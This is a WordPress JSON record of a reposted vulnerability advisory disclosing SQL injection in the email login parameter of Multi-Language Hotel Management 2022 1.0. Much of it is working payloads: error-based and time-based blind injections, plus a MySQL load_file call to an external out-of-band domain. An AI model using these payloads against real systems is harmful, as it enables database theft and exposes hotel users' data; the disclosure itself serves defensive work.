{"id":28916,"date":"2022-08-03T19:50:53","date_gmt":"2022-08-03T15:50:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167912\/mlhm202210-sql.txt"},"modified":"2022-08-13T12:01:31","modified_gmt":"2022-08-13T07:31:31","slug":"multi-language-hotel-management-2022-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/multi-language-hotel-management-2022-1-0-sql-injection\/","title":{"rendered":"Multi-Language Hotel Management 2022 1.0 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 08.03.2022<br \/>\n## Vendor: https:\/\/www.nikhilbhalerao.com\/<br \/>\n## Software: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/blob\/main\/vendors\/Nikhil%20Bhalerao\/2022\/Multi-Language-Hotel-Management-2022\/Docs\/sparkz.zip<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Nikhil%20Bhalerao\/2022\/Multi-Language-Hotel-Management-2022<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe `email` parameter appears to be vulnerable to SQL injection attacks.<br \/>\nThe payload &#8216;+(select<br \/>\nload_file(&#8216;\\\\\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\\\ais&#8217;))+&#8217;<br \/>\nwas submitted in the email parameter.<br \/>\nThis payload injects a SQL sub-query that calls MySQL&#8217;s load_file<br \/>\nfunction with a UNC file path that references a URL on an external<br \/>\ndomain.<br \/>\nThe attacker can easily get the all database from this hotel system<br \/>\nand can do very malicious stuff with the users who are inside of this<br \/>\nsystem.<\/p>\n<p dir=\"ltr\">Status: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">&#8220;`mysql<br \/>\n&#8212;<br \/>\nParameter: email (POST)<br \/>\nType: error-based<br \/>\nTitle: MySQL &gt;= 5.0 AND error-based &#8211; WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: email=hmqHtDjH@burpcollaborator.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\\\ais&#8217;))+&#8221;||(SELECT<br \/>\n0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT<br \/>\nCOUNT(*),CONCAT(0x7162787671,(SELECT<br \/>\n(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY<br \/>\nx)a))||&#8217;&amp;password=m5S!k0l!S6&amp;login=<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: email=hmqHtDjH@burpcollaborator.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\\\ais&#8217;))+&#8221;||(SELECT<br \/>\n0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM<br \/>\n(SELECT(SLEEP(15)))ygbC))||&#8217;&amp;password=m5S!k0l!S6&amp;login=<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Nikhil%20Bhalerao\/2022\/Multi-Language-Hotel-Management-2022)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/uk7zq2)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi ## Author: nu11secur1ty ## Date: 08.03.2022 ## Vendor: https:\/\/www.nikhilbhalerao.com\/ ## Software: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/blob\/main\/vendors\/Nikhil%20Bhalerao\/2022\/Multi-Language-Hotel-Management-2022\/Docs\/sparkz.zip ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Nikhil%20Bhalerao\/2022\/Multi-Language-Hotel-Management-2022 ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The payload &#8216;+(select load_file(&#8216;\\\\\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\\\ais&#8217;))+&#8217; was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL&#8217;s load_file function with &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28916","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28916","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28916"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28916\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28916"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28916"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28916"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}